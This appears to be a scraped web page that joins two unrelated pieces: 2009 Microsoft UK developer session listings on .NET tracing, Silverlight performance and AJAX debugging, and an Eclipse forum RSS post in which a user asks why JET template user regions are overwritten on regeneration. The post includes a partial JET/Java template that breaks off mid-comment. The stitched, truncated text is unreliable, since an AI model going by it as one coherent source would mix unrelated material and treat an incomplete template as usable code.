Did you know that the System.Diagnostics namespace was revamped in .NET 2.0? Are you aware of the excellent tracing facilities that are available within the .NET framework? Do you know how to easily add performance counters into an application, and how to do this with the least amount of trouble? And do you know that there are tools available with the .NET framework that allow you to visualise and correlate an end to end trace over WCF? If not then this is the session for you. Morgan will show how the classes within the System.Diagnostics namespace can be used to instrument your application and how to implement method entry/exit logging with the minimum of code. This session will also be useful if you are using a third party logging framework as some of the principles described can be used however you expose logging data.
Optimising Silverlight Performance (Chris Barker)
Friday 21st August 2009 from 11:00 – 12:00 UK Time
As applications and web sites become “richer” more functionality is hosted in the browser, in many cases within Silverlight applications. Although this provides a great User Experience, care should be taken that the responsiveness of the application is not compromised. This SoundByte is focused on ensuring that Silverlight applications perform well, maintaining the Rich User Experience. It requires reasonable knowledge of Silverlight and .NET programming.
Debugging and Tuning AJAX Applications (Simon Ince)
Friday 25th September 2009 from 11:00 – 12:00 UK Time
200
As web applications demand richer content so the complexity and volume of client-side code increases. Pushing this processing to the browser means that end users can experience errors or performance degradation without the developer’s knowledge. This session looks at a set of tools and techniques that will help you understand and remediate performance or functional problems within your AJAX code. Examples will be in ASP.NET AJAX 3.5 SP1, jQuery, and C#.
To book a place on any of these SoundBytes please contact your TAM or ADC, specifying the SoundByte you are interested in, and the names, email addresses, and telephone numbers of all the required attendees.
Please keep an eye on this blog or contact your ADC for information on future SoundBytes. | http://blogs.msdn.com/b/ukadc/archive/2009/07/15/adc-soundbytes-july-september-2009.aspx | CC-MAIN-2015-35 | refinedweb | 530 | 61.87 |
Currently, certain invalid MathML documents (such as a MathML document containing arbitrary HTML markup) is rendered improperly. According to the MathML specification, we should be providing better error information.
From), Section 6.4 Combining MathML and Other Formats:
."
I looked at the torture tests in WebKitGTK+ and they seem fine.
See also:
"User agents must act as if any MathML element whose contents does not match the element's content model was replaced, for the purposes of MathML layout and rendering, by an merror element in the MathML namespace containing some appropriate error message."
Created attachment 215269 [details]
testcase
(In reply to comment #1)
> I looked at the torture tests in WebKitGTK+ and they seem fine.
I think this comment was intended for Bug 121728. :-)
At the moment, the choice in the in-progress MathML refactoring is just to not display anything for invalid markup. However, we may do something as in Gecko and the refactoring will make that much easier. So I'm making this depends on bug 153991.
(That said, I suspect we want to spend more time on supporting valid markup than on deciding a fallback rendering for invalid markup...) | https://bugs.webkit.org/show_bug.cgi?id=123348 | CC-MAIN-2020-05 | refinedweb | 193 | 63.9 |
I.
By now, I would assume that everyone has at least heard of the Kinect and understands the basic premise. It's a specialized sensor built by Microsoft
that is capable of recognizing and tracking humans in 3D space. How is it able to do that? While it's true that the Kinect has two cameras in it,
it does not accomplish 3D sensing through stereo optics. A technology called Light Coding makes the 3D sensing possible.
On the Kinect, there is an Infrared (IR) Projector, a Color (RGB) Camera, and an Infrared (IR) Sensor. For purposes of 3D sensing, the IR Projector emits
a grid of IR light in front of it. This light then reflects off objects in its path and is reflected back to the IR Sensor. The pattern received
by the IR Sensor is then decoded in the Kinect to determine the depth information and is sent via USB to another device for further processing.
This depth information is incredibly useful in computer vision applications. As a part of the Kinect Beta SDK, this depth information is used
to determine joint locations on the human body, thereby allowing developers like us to come up with all sorts of useful applications and functionality.
Before you download the links for either the demo application source or demo application executable, you need to prepare your development environment.
To use this application, you need to have the Kinect Beta 2 SDK installed
on your machine:.
At the time of this posting, the commercial SDK has not been released. Please be sure to only use the Kinect Beta 2 SDK for this article’s downloads.
Also, the SDK installs with a couple demo applications; please be sure that these run on your machine before you download the files for this article.
Before I dive into the solution, let me better express the problem. Below is a screenshot.
The first step in the pixel filtering process is to transform the depth data from the Kinect into something that is a bit easier to process.
private short[] CreateDepthArray(ImageFrame image)
{
short[] returnArray = new short[image.Image.Width * image.Image.Height];
byte[] depthFrame = image.Image.Bits;
// Porcess each row in parallel
Parallel.For(0, 240, depthImageRowIndex =>
{
// Process each pixel in the row
for (int depthImageColumnIndex = 0; depthImageColumnIndex < 640; depthImageColumnIndex += 2)
{
var depthIndex = depthImageColumnIndex + (depthImageRowIndex * 640);
var index = depthIndex / 2;
returnArray[index] =
CalculateDistanceFromDepth(depthFrame[depthIndex], depthFrame[depthIndex + 1]);
}
});
return returnArray;
}
This method creates a simple short[] into which a depth value for each pixel is placed. The depth value is calculated from the byte[]
of an ImageFrame that is sent every time the Kinect pushes a new frame. For each pixel, the byte[] of the ImageFrame has two values.
short[]
byte[]
ImageFrame
private short CalculateDistanceFromDepth(byte first, byte second)
{
// Please note that this would be different if you
// use Depth and User tracking rather than just depth
return (short)(first | second << 8);
}
Now that we have an array that is a bit easier to process, we can begin applying the actual filter to it. We scan through the entire array, pixel by pixel,
looking for Zero values. These are the values that the Kinect couldn't process properly. We want to remove as many of these as realistically possible without
degrading performance or reducing other features of the data (more on that later).
When we find a Zero value in the array, it is considered a candidate for filtering, and we must take a closer look. In particular, we want to look
at the neighboring pixels. The filter effectively has two "bands" around the candidate pixel, and is used to search for non-Zero values in other pixels. The filter
creates a frequency distribution of these values, and takes note of how many were found in each band. It will then compare these values to an arbitrary
threshold value for each band to determine if the candidate should be filtered. If the threshold for either band is broken, then the statistical
mode of all the non-Zero values will be applied to the candidate, otherwise it is left alone.
The biggest considerations for this method are ensuring that the bands for the filter actually surround the pixel as they would be displayed in the rendered image,
and not just values next to each other in the depth array. The code to apply this filter is as follows:
short[] smoothDepthArray = new short[depthArray.Length];
// We will be using these numbers for constraints on indexes
int widthBound = width - 1;
int heightBound = height - 1;
// We process each row in parallel
Parallel.For(0, 240, depthArrayRowIndex =>
{
// Process each pixel in the row
for (int depthArrayColumnIndex = 0; depthArrayColumnIndex < 320; depthArrayColumnIndex++)
{
var depthIndex = depthArrayColumnIndex + (depthArrayRowIndex * 320);
// We are only concerned with eliminating 'white' noise from the data.
// We consider any pixel with a depth of 0 as a possible candidate for filtering.
if (depthArray[depthIndex] == 0)
{
// From the depth index, we can determine the X and Y coordinates that the index
// will appear in the image. We use this to help us define our filter matrix.
int x = depthIndex % 320;
int y = (depthIndex - x) / 320;
// The filter collection is used to count the frequency of each
// depth value in the filter array. This is used later to determine
// the statistical mode for possible assignment to the candidate.
short[,] filterCollection = new short[24,2];
// The inner and outer band counts are used later to compare against the threshold
// values set in the UI to identify a positive filter result.
int innerBandCount = 0;
int outerBandCount = 0;
// The following loops will loop through a 5 X 5 matrix of pixels surrounding the
// candidate pixel. This defines 2 distinct 'bands' around the candidate pixel.
// If any of the pixels in this matrix are non-0, we will accumulate them and count
// how many non-0 pixels are in each band. If the number of non-0 pixels breaks the
// threshold in either band, then the average of all non-0 pixels in the matrix is applied
// to the candidate pixel.
for (int yi = -2; yi < 3; yi++)
{
for (int xi = -2; xi < 3; xi++)
{
// yi and xi are modifiers that will be subtracted from and added to the
// candidate pixel's x and y coordinates that we calculated earlier. From the
// resulting coordinates, we can calculate the index to be addressed for processing.
// We do not want to consider the candidate
// pixel (xi = 0, yi = 0) in our process at this point.
// We already know that it's 0
if (xi != 0 || yi != 0)
{
// We then create our modified coordinates for each pass
var xSearch = x + xi;
var ySearch = y + yi;
// While the modified coordinates may in fact calculate out to an actual index, it
// might not be the one we want. Be sure to check
// to make sure that the modified coordinates
// match up with our image bounds.
if (xSearch >= 0 && xSearch <= widthBound &&
ySearch >= 0 && ySearch <= heightBound)
{
var index = xSearch + (ySearch * width);
// We only want to look for non-0 values
if (depthArray[index] != 0)
{
// We want to find count the frequency of each depth
for (int i = 0; i < 24; i++)
{
if (filterCollection[i, 0] == depthArray[index])
{
// When the depth is already in the filter collection
// we will just increment the frequency.
filterCollection[i, 1]++;
break;
}
else if (filterCollection[i, 0] == 0)
{
// When we encounter a 0 depth in the filter collection
// this means we have reached the end of values already counted.
// We will then add the new depth and start it's frequency at 1.
filterCollection[i, 0] = depthArray[index];
filterCollection[i, 1]++;
break;
}
}
// We will then determine which band the non-0 pixel
// was found in, and increment the band counters.
if (yi != 2 && yi != -2 && xi != 2 && xi != -2)
innerBandCount++;
else
outerBandCount++;
}
}
}
}
}
// Once we have determined our inner and outer band non-zero counts, and
// accumulated all of those values, we can compare it against the threshold
// to determine if our candidate pixel will be changed to the
// statistical mode of the non-zero surrounding pixels.
if (innerBandCount >= innerBandThreshold || outerBandCount >= outerBandThreshold)
{
short frequency = 0;
short depth = 0;
// This loop will determine the statistical mode
// of the surrounding pixels for assignment to
// the candidate.
for (int i = 0; i < 24; i++)
{
// This means we have reached the end of our
// frequency distribution and can break out of the
// loop to save time.
if (filterCollection[i,0] == 0)
break;
if (filterCollection[i, 1] > frequency)
{
depth = filterCollection[i, 0];
frequency = filterCollection[i, 1];
}
}
smoothDepthArray[depthIndex] = depth;
}
}
else
{
// If the pixel is not zero, we will keep the original depth.
smoothDepthArray[depthIndex] = depthArray[depthIndex];
}
}
});
I have recently updated this filter to be more accurate compared to my original post. In my original post, if any of the band thresholds were broken,
the statistical mean of all non-Zero pixels in the filter matrix was assigned to the candidate pixel; I have changed this to use the statistical mode. Why does this matter?
Consider the previous picture representing a theoretical filter matrix of depth values. From looking at these values, we can visually identify that there is
probably an edge of some object in our filter matrix. If we were to apply the average of all these values to the candidate pixel, it would remove the
noise from the X,Y perspective but it would introduce noise along the Z,Y perspective; placing the candidate pixel's depth half way between the two
individual features. By using the statistical mode, we are mostly assured of assigning a depth to the candidate pixel that matches the most dominant feature in the filter matrix.
I say 'mostly' because there is still a chance of identifying a submissive feature as being dominant due to small variances in
the depth readings; this has had negligible effect on the results though. A solution to this issue involves data discretization and deserves a separate article of its own.
Now that we have a filtered depth array on our hands, we can move on to the process of calculating a weighted moving average of an arbitrary number of previous depth arrays.
The reason we do this is to reduce the flickering effect produced by the random noise still left in the depth array. At 30 fps, you're really going to notice the flicker.
I had previously tried an interlacing technique to reduce the flicker, but it never really looked as smooth as I would like. After experimenting with a couple other methods,
I settled on the weighted moving average.
What we do is set up a Queue<short[]> to store our most recent N number of depth arrays. Since Queue's are a FIFO (First In, First Out) collection object,
they have excellent methods to handle discrete sets of time series data. We then weight the importance of the most recent depth arrays to the highest, and the importance
of the oldest the lowest. A new depth array is created from the weighted average of the depth frames in the Queue.
Queue<short[]>
This weighting method was chosen due to the blurring effect that averaging motion data can have on the final rendering. If you were to stand still,
a straight average would work fine with a small number of items in your Queue. However, once you start moving around, you will have a noticeable trail
behind you anywhere you go. You can still get this with a weighted moving average, but the effects are less noticeable. The code for this is as follows:
averageQueue.Enqueue(depthArray);
CheckForDequeue();
int[] sumDepthArray = new int[depthArray.Length];
short[] averagedDepthArray = new short[depthArray.Length];
int Denominator = 0;
int Count = 1;
// REMEMBER!!! Queue's are FIFO (first in, first out).
// This means that when you iterate over them, you will
// encounter the oldest frame first.
// We first create a single array, summing all of the pixels
// of each frame on a weighted basis and determining the denominator
// that we will be using later.
foreach (var item in averageQueue)
{
// Process each row in parallel
Parallel.For(0,240, depthArrayRowIndex =>
{
// Process each pixel in the row
for (int depthArrayColumnIndex = 0; depthArrayColumnIndex < 320; depthArrayColumnIndex++)
{
var index = depthArrayColumnIndex + (depthArrayRowIndex * 320);
sumDepthArray[index] += item[index] * Count;
}
});
Denominator += Count;
Count++;
}
// Once we have summed all of the information on a weighted basis,
// we can divide each pixel by our denominator to get a weighted average.
Parallel.For(0, depthArray.Length, i =>
{
averagedDepthArray[i] = (short)(sumDepthArray[i] / Denominator);
});
Now that we have applied both of our smoothing techniques to the depth data, we can render the image to a Bitmap:
Bitmap
// We multiply the product of width and height by 4 because each byte
// will represent a different color channel per pixel in the final iamge.
byte[] colorFrame = new byte[width * height * 4];
// Process each row in parallel
Parallel.For(0, 240, depthArrayRowIndex =>
{
// Process each pixel in the row
for (int depthArrayColumnIndex = 0; depthArrayColumnIndex < 320; depthArrayColumnIndex++)
{
var distanceIndex = depthArrayColumnIndex + (depthArrayRowIndex * 320);
// Because the colorFrame we are creating has four times as many bytes representing
// a pixel in the final image, we set the index to be the depth index * 4.
var index = distanceIndex * 4;
// Map the distance to an intesity that can be represented in RGB
var intensity = CalculateIntensityFromDistance(depthArray[distanceIndex]);
// Apply the intensity to the color channels
colorFrame[index + BlueIndex] = intensity;
colorFrame[index + GreenIndex] = intensity;
colorFrame[index + RedIndex] = intensity;
}
});
Now that I have shown you some of the code and theory behind the smoothing process, let’s look at it in terms of using the demo application provided in the links above. its.
I'll leave you with a brief video demonstration of the demo application. In it, I pretty much just sit and wave my arms around, but it gives you a good idea
of what these techniques are capable of doing. I run through all the combinations of features in 70 seconds, and no audio.
Please keep in mind, that it is almost impossible to see a change in the flicker when I turn off the weighted moving average due to the low frame rate
of YouTube. You'll just have to trust me, or download the code; it's like night and day.
Here is a direct link to the video on YouTube:.
If this topic interests you, I would highly recommend reading the Microsoft Research paper on KinectFusion: Real-Time Dense Surface Mapping and Tracking.
They have done some amazing work in this particular area. However, I don’t think you would ever be able to achieve these results
with .NET:.
This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)
General News Suggestion Question Bug Answer Joke Rant Admin
Math Primers for Programmers | http://www.codeproject.com/Articles/317974/KinectDepthSmoothing | CC-MAIN-2013-20 | refinedweb | 2,446 | 58.01 |
sem_open - initialise and open a named semaphore (REALTIME)
#include <semaphore.h> sem_t *sem_open(const char *name, int oflag, ...);
The sem_open() function establishes will refer to the same semaphore object, as long as that name has not been removed. If name does not begin with the slash character, the effect is implementation-dependent. The interpretation of slash characters other than the leading slash character in name is implementation-dependent.
If a process makes multiple successful calls to sem_open() with the same value for name, the same semaphore address is returned for each such successful call, provided that there have been no calls to sem_unlink() for this semaphore.
References to copies of the semaphore produce undefined results. string exceeds PATH_MAX, or a pathname component is longer than NAME_MAX while _POSIX_NO_TRUNC is in effect.
- [ENFILE]
- Too many semaphores are currently open in the system.
- [ENOENT]
- O_CREAT is not set and the named semaphore does not exist.
- [ENOSPC]
- There is insufficient space for the creation of the new named semaphore.
- [ENOSYS]
- The function sem_open() is not supported by this implementation.
None.
None.
None.
semctl(), semget(), semop(), sem_close(), sem_post(), sem_trywait(), sem_unlink(), sem_wait(), <semaphore.h>.
Derived from the POSIX Realtime Extension (1003.1b-1993/1003.1i-1995) | http://www.opengroup.org/onlinepubs/007908799/xsh/sem_open.html | crawl-002 | refinedweb | 201 | 57.67 |
The.
What’s New
XNA Math version 2.04 includes:
- Addition of new data types and associated load-store functions:
- XMBYTEN2, XMBYTE2, XMUBYTEN2, XMUBYTE2
- XMLoadByteN2, XMLoadByte2, XMLoadUByteN2, XMLoadUByte2
- XMStoreByteN2, XMStoreByte2, XMStoreUByteN2, XMStoreUByte2
- XMINT2, XMUINT2, XMINT3, XMUINT3, XMINT4, XMUINT4
- XMLoadSInt2, XMLoadUInt2, XMLoadSInt3, XMLoadUInt3, XMLoadSInt4, XMLoadUInt4
- XMStoreSInt2, XMStoreUInt2, XMStoreSInt3, XMStoreUInt3, XMStoreSInt4, XMStoreUInt4
- Marked most single-parameter C++ constructors with ‘explicit’ keyword
- Corrected range issues with SSE implementations of
XMVectorFloorand
XMVectorCeiling
- Resolved a boundary issue with
XMLoadShort*and
XMLoadByte*that previously triggered an assert on values -32768 / -128
Release Notes
- Due to a bug in optimizations done by the Visual Studio 2010 C/C++ compiler, some XNA Math functions will not work properly when used with
_XM_NO_INTRINSICS_. This bug only appears at full optimization settings (/Ox) for Windows 32-bit, and may appear at any optimization setting for Windows 64-bit (x64). This issue does not impact the SSE2 intrinsic version of the XNA Math functions. This issue is fixed in Visual Studio 2010 Service Pack 1. ‘breaking’.
GitHub: Note that DirectXMath is now hosted on GitHub.
It's a pitty, that there is no date for a new release of the DX-SDK. Our team has found a strange bug within XAudio. If you want to know more about that, please post it here and I'll contact you.
Why MS deleted all the xna math 2.0x msdn library reference? Ok, there is the new directxmath, aka xna math 3.0x, but how about people that need the old documentation? :
Aessio – The libraries are generally pretty close, so you don't generally need the old docs. You can get them in the DirectX SDK (June 2010) in the offline documentation file if you really need them.
Generally people should be using the DirectXMath version instead of XNAMath. It really only makes sense for folks writing for Xbox 360 or having to stick with VS 2008 for some reason (in which case see XNAMath 2.05). You can use DirectXMath for VS 2010 or VS 2012, Windows Store Apps, and Win32 desktop apps for Windows Vista, Windows 7, and Windows 8. Really if you needed to, you could even use it for Windows XP but you'd have to copy the files into your path since the "110_xp" Platform target for VS 2012 is otherwise using the Windows 7.1 SDK headers.
Our of curiosity, why are you still using XNAMath instead of DirectXMath?
Thx for the replay.
I started learning some D3D tutorial that use XNA Math, but now I decided to convert them to DirectXMath as "homework", so that's not a big deal as you wrote :p
In XNA Math you can create vertexes using XMFLOAT3 how do you that in DirectXMath?
DirectXMath also has XMFLOAT3. It's just in a C++ namespace now.
Real works always found due required invention.
– 'stay true jcrue.' | https://blogs.msdn.microsoft.com/chuckw/2011/02/22/xna-math-version-2-04/ | CC-MAIN-2017-17 | refinedweb | 475 | 54.32 |
Persistent Place Identifier
This page is for a systematic review of the theme:
a unique identifier to identify an OSM feature, and that never changes. (for short a
perma_id).
As working definition for OSM feature we can say that it is "a kind of map feature, a stable thing in some (time-space) scale of reference"...
The theme have its concepts and problems/solutions to be discussed, and this article is is used to express and preserve reference-models, consensus and working definitions. Some parts of this theme are under "diffuse discussion" with no nitid consensus, so this article also reflect the diversity of opinions — the article express, when possible, a neutral point of view — and the lack of some solid definitions.
There are also closed proposals, the Permanent ID and the stable.openstreetmap.org server, with nitid objectives and less diffuse discussion.
Working definitions
As working definition for OSM feature we can say that it is a "stable thing in some scale of reference"... In detail:
- is an OSM element: relation, way or node.
The element is already the container of the core ID, and would also be the container of the perma_id, but they differ in many characteristics:
1- the datatype (the core ID is an serial integer and perma_id can be non-serial or even hierarchical value like an IP number); 2- the obligation (perma_id is not necessary in all elements); 3- the backup/restore process (core ID will be refreshed with a new value); 4- the move of the perma_id from original element to a new/evolved element, to fit its concept in better editions of the map or reality evolution; 5- the perma_id can be implemented as tag (or even as lookup table) instead core attribute.
- has public utility (a concept): as an OSM's point of interest concept, it have some tags associated and can be characterized as map feature.
Is possible to to check "importance" (notability or utility-stability) of the feature, through some objective criterion – or, in the absence of criteria, through voting.
- has a time-scale of reference to say "is stable about time" ("not changed"). The time-scales for mountains are bigger than a museums, that are bigger than restaurants or pubs.
- has a time-class: a practical way to assign time-scale to an object. The time-class can be inferred from element's tags and metrics.
PS: "class geographical" (rivers and mountains) and "class administrative" (countries and cities) objects have different global time-scales. And subclasses for smaller objects: a mountain range have a different time-scale than a little mountain, a city have different time-scale than a country.
- has creation and extinction criteria to attributes like "creation year" and "extinction year".
PS: when a natural object like a island is extinct, its perma_id persist, and by the perma_id its geometry can be restored from some "official OSM backup".
- has error-position reference to say "is stable about position" ("not changed its position"). 1km, 10km, 1m, 5m... each kind of object have an admissible error-position.
- has error-concept reference to say "is stable about concept" ("not changed its public utility"). Is acceptable to a pub change to a restaurant, but not to change to an hospital. Is acceptable that a city changes its name, but not that changes from "official city" to "non-official" or to "official district of other city".
So, the uniqueness of the perma_id is about this working definition: there are a unique OSM-element with that identifier.
Non-persistent IDs
There are good candidates to "persistent place-identifier", but all fails in the main property, that is to ensure persistence. In this context of non-permanent IDs, the most important example is the Nominatim's
place_id that is "independent of geometry".
Element's OSM_ID
Elements are the main references as "official geometry ID":
- Relation ID: the unique-ID of an element of the kind "relation",
as official URL
openstreetmap.org/relation/$OSM_RID
as original XML
<relation id="$OSM_RID" changeset="$OSM_CHGID" ...>...</relation>
- Way ID: the unique-ID of an element
as official URL
openstreetmap.org/way/$OSM_WID
as original XML
<way id="$OSM_WID" changeset="$OSM_CHGID" ... />...</way>(example).
- Node ID: the unique-ID of an element
as official URL
openstreetmap.org/node/$OSM_NID
as original XML
<node id="$OSM_WID" changeset="$OSM_CHGID" .../>(example).
Nominatim's place_id (internal identifier)
Nominatim is a tool to search OSM data by name or address, and, to operate internally this tool, it uses a lookup table
<place_id,osm_type,osm_id>
to offer the
place_id as an "OSM any element ID".
The
osm_type can by any, a relation, way or node. Example: the
place_id=178741737 was a record with
osm_type=relation and
osm_id=62422 in July 2018, that was the Berlin (Q64) concept, pointing to the correct map
- NOTICE: the Nominatim's place_id place_id is only an internal parameter of the engine. You cannot use place_id for anything, it is a technical database key and depends on a single Nominatim instance.
OSM external persistence implementations
Implementations that are "non-official", where the implemented perma_id is not a tag neither an XML-attribute of dumps or backups. In the case of an API (eg. an ID-resolver), is "external" in the sense that the URL of its endpoint is not implemented with the
openstreetmap.org domain.
Query-to-map
See Query-to-map. Preserves the "permanent name" (name and type) of an OSM feature in the service
query2map.toolforge.org. Use name as main identifier, and key (and types?) as "namespace" for name.
OSMLR
As Github's project opentraffic/osmlr (see also blog presentation) is a complex "backup and lookup" system that ensures persistence of the ID of "almost any stretch of roadways in OpenStreetMap".
Have good historical data, so we can use it tho check our stability hypothesis.
Overpass API/Permanent ID
See Overpass API/Permanent ID ... need better explanation there ... Please help to enhance it.
Non-OSM reference-implementations
Other reference-examples. The main is Wikidata, that have a little coupling with OSM.
As URL
See w:Persistent uniform resource locator (Persistent URL or PURL).
In Wikidata infrastructure
Persistent (place) unique identifiers (perma_id's) assigned by "Place-ID autorithies".
(to see a list of all valid authorities, follow the link and click on the "play")
Each authority-ID can be described as: URN-schema (the authority's namespace) and a valid URN in that schema. (see wikipedia's namespace and URN concepts). See a sample on the right side table.
See also w:Office for National Statistics list.
... (under construction)...
Problems and solutions
For each reasonable problem there is a reasonable solution (to be detailed in the future implementation), and so far, within the working definitions elaborated at the beginning of the article, no major problems were detected, which would impair the Persistent Place Identifier.
Defining classes of OSM features
To classify OSM features (when it will be assigned with perma_id) according tags that describe the element, in a more coarse set of map feature, we can imagine some basic groups, labeled by an arbitrary group-number:
0- administrative map features: for cities, countries, districts, etc.
1- "relief and hydrography" map features: for rivers, mountains, etc.
2- transport map features: for all ways, cycleways, train lines, etc.
3- other: no many others.
Each group have a difference scale-correlation behaviour, so is necessary to characterize group before to characterize time and spatial scales of the OSM feature.
Defining spatial scale of a OSM feature
There are some usual spatial scale definitions in Geography, and simple database functions (ref. PostGIS) and approximations as ST_Length(), ST_Area or ST_Area(ST_Envelope()) that will automatically classify the element (way or relation) that represents a taged feature.
The use of the scale, by other hand, is to estimate error position, and the "acceptable error" is an subjective criteria. For example maps of some nations of Africa and souh america can accept big changes, enquanto mapas de certas nações da europa podem não aceitar.
Defining time scale of a OSM feature
Time scales here is not about "Geologic time scale" neither the usual orders of magnitude in time units. Is a razonable choice of units for each general type ...
... (under construction)...
Assigning the perma_id
The rules to say "ok this OSM feature can be assigned to a perma_id", because (supposing to) we can't assign a perma_id to all nodes of the OSM map, there are a "preservation cost", so we must to reduce or to avoid exaggerations.
Supposing all elements passed in a simple "stability check" and potential watchers before assign, there are two main ways to assign:
- Automatic assign: by Wikidata tag, and/or "importance threshold" to cut non-relevant map features.
- Human decision: voting pull, in a scale-related watchers (city or country) local community.
Ideal and practical position-reference
The "has error-position reference" property (see begin of the page) to ensure that a OSM feature not changed its position — with OSM-user edits in the map, or with some natural evolution of the reality.
The ideal is transformation like TopoJSON, ST_Simplify, etc. but, for practical and low-cost implementation, the only "last position in the map before changes" that we need to check is the centroid (eg. PostGIS's ST_PointOnSurface) or the BBOX, and validate changes against some error-position criteria (see "Defining spatial scale" above).
The "change validation" algorithm is not so simple... And can be implemented in only one or in many moments of the workflow:
- On an OSM's editor: ideal as pre-processing some basic validation and warning user...
- On the OSM's Editing API: the correct locus for ensure continuous control and quality.
- On a quality-control tool: a "long time" checker (eg. each year) and review task. System low-impact, software low-cost, but human high cost. Ideal for first experiments with perma_id.
... (under construction)...
FAQ and perhaps false criticisms
Frequently Asked Questions and frequent criticism with, perhaps (on the facts explained in this page), false premises.
... (under construction)...
...
... (under construction)... | https://wiki.openstreetmap.org/wiki/Persistent_Place_Identifier | CC-MAIN-2021-43 | refinedweb | 1,664 | 53 |
Setting up the VS 2010 projectNow that we've finished building our level it is now time to begin the coding side of the project. For this lesson, we will be using Visual Studio 2010 on Windows, but you can follow the equivalent steps for Xcode on Mac. Right-click on the project name in the project list and select the Open Folder menu item from the context menu that pops up. This will open the project folder in Windows Explorer (or Finder on Mac). Navigate to the Projects/Windows folder and open the file MyGame.sln. At this point in time we are going to create a few blank C++ and Header files that we will be fleshing out throughout the tutorial.
Creating C++ FilesIn the Visual Studio's Solution Explorer (normally located on the left side of the screen) right click on the Source folder and select Add->New Item, A new item window will pop up and we are going to select "C++ File (.cpp)" and name the file "Player" we also want to change the location of this file so on the right side of "Location" click the browse button and navigate to "MyGame/Source" and click "Select Folder" finally click Add and our new Player.cpp file will appear in the Solution Explorer. We will also want a "Node.cpp" file so repeat the process again but this time name the file "Node".
Creating Header FilesAdding header files into Visual Studios 2010 is essentially the same process as adding in a cpp file. This time we will click on the "Header Files" folder in the solution explorer, right click and select Add->New Item. The window from before will pop up, but now we select "Header File (.h)" instead. Once again we will want these files saved in the "MyGame/Source" folder so remember to save to the correct folder. We are going to make three headers for this tutorial so repeat the steps of adding a new file for Player.h, Node.h, and MyGame.h.
MyGame.hInside MyGame.h we are going to set a series of #define statements that will allow other files to just make a single #define call. You will notice a call to #pragma once, this is a preprocessor directive that says "only include the following files if they're not already included". After this call we insert #define calls to leadwerks.h, node.h, and player.h:
#pragma once #include "Leadwerks.h" #include "Node.h" #include "Player.h"
App ClassBy default the App class contains two functions for structuring a game. App::Start() will be called when the game begins, and App::Loop() will be called continuously until the game ends. Inside App.h we are going to remove the default camera and add in a Player, the resulting file should look as such:
#pragma once #include "Leadwerks.h" #include "MyGame.h" using namespace Leadwerks; class App { public: Window* window; Context* context; World* world; Player* player; App(); virtual ~App(); virtual bool Start(); virtual bool Loop(); };Since we removed the default camera from App.h we will also need to remove the initialization call within the App constructor inside App.cpp:
App::App() : window(NULL), context(NULL), world(NULL){}Next we are going to create a new instance of a player in App::Start() as well as call the player's Update function in App::Loop():
//Create the player player = new Player; //Update the player player->Update();Also inside the App::Start() function, we are going to load an ambient background sound, then have that sound play on a continuous loop. (We'll replace this with something more advanced later on, but this is fine for now):
Sound* sound = Sound::Load("Sound/Ambient/cryogenic_room_tone_10.wav"); Source* source = Source::Create(); source->SetSound(sound); source->SetLoopMode(true); source->Play();By the end of these changes your finished App class should look like the following:
#include "App.h" #include "MyGame.h" using namespace Leadwerks; App::App() : window(NULL), context(NULL), world(NULL) {} App::~App() { //delete world; delete window; } bool App::Start() { //Create a window window = Window::Create("MyGame"); //Create a context context = Context::Create(window); //Create a world world = World::Create(); //Create the player player = new Player; std::string mapname = System::GetProperty("map","Maps/start.map"); if (!Map::Load(mapname)) Debug::Error("Failed to load map \""+mapname+"\"."); //Move the mouse to the center of the screen window->HideMouse(); window->SetMousePosition(context->GetWidth()/2,context->GetHeight()/2); Sound* sound = Sound::Load("Sound/Ambient/cryogenic_room_tone_10.wav"); Source* source = Source::Create(); source->SetSound(sound); source->SetLoopMode(true); source->Play(); world->SetAmbientLight(0,0,0,1); return true; } bool App::Loop() { //Close the window to end the program if (window->Closed() || window->KeyDown(Key::Escape)) return false; //Update the game timing Time::Step(); //Update the world world->Update(); //Update the player player->Update(); //Render the world world->Render(); //Sync the context context->Sync(true); return true; }
Node ClassNext we are going to create a base class which we will call Node. All classes in our game will be derived from this base class. This is called inheritance, because each class inherits members and functions from the class it's derived from. We can override inherited class functions with new ones, allowing us to create and extend behavior without rewriting all our code each time. The Node class itself will be derived from the Leadwerks Object class, which is the base class for all objects in Leadwerks. This will give us a few useful features right off the bat. Our Node class can use reference counting, and it can also be easily passed to and from Lua. The node header file will get just one member, an Entity object:
#pragma once #include "MyGame.h" using namespace Leadwerks; class Node : public Object { public: Entity* entity; Node(); virtual ~Node(); };In the Node.cpp file, we'll add the code for the Node constructor and destructor:
#include "MyGame.h" Node::Node() : entity(NULL) { } Node::~Node() { if (entity) { if (entity->GetUserData()==this) entity->SetUserData(NULL); entity->Release(); entity = NULL; } }Our code foundation has now been laid and it is finally time to move onto developing the player class, which will be the subject of our next lesson.
You need to be a member in order to leave a comment
Sign up for a new account in our community. It's easy!Register a new account
Already have an account? Sign in here.Sign In Now | https://www.gamedev.net/articles/programming/general-and-gameplay-programming/building-a-first-person-shooter-part-11-visual-studio-setup-r3099/ | CC-MAIN-2019-39 | refinedweb | 1,074 | 61.46 |
Eclipse Community Forums - RDF feed Eclipse Community Forums UserRegion Does not work... Please help <![CDATA[Originally posted by: confmb.capgroup.com I sent a message a few days ago about issues I am having with UserRegion - unfortunately nobody replied and I think it is because the message was somewhat lost in the thread. Therefore I am resending the post - please - please - please help - Below I include my full template - in order to be more specific. A few important remark: - I do have multiple user region. Is this ok? - The user region inside the constructor never works - the code is overwritten everytime. - The third user region almosr never works - code overwritten everytime. But I think I saw it working before on occasions (not sure). - The second user region works almost always. Except that it works in reverse - that is if I leave the tag @generated_OtherConstructor alone then it does not overwritte my code. If I chnage the tag to @!generated_OtherConstructor - then it overwrite the code. This is the opposite behavior from what is explained in the documentation. Pretty wierd isn't it? - I have the text string "generated" somewhere in the comments of the class. Does it matter? Isn't the tool suppose to parse the text of the class and only worry about what is inside the user region markup comments? For me these markups are : // BEGIN user region <OtherMethod> and // END user region <OtherMethod> Are they ok? Is there a specific convention I should follow? - About the unmodifiedMarker. Since I have multiple user regions in the class then these markups have different names. Is this ok? If not how could jet distinguish between regions? I hope this is more specific and will help find out what is going on. If you can solve this problem for me then I will certainly be very grateful. This issue is preventing us from using jet more within our company. We need to have some generated code be customized by the users and not overwritten later. Thanks a lot in adavance. Frederic ___________________________Beginning of template_________________________ <c:include package <c:get; <java:importsLocation /** * Documentation for the class <c:get: * * This class contains the business functionality method associated with this class. * The infrastructure functionality for this class is auto generated and is implemented in the class '{@link <java:import><c:get._g.<c:get_g</java:import>}'. * <c:if * <c:get * </c:if> * * You can change the code in the user region. To prevent your changes from being overwritten the next 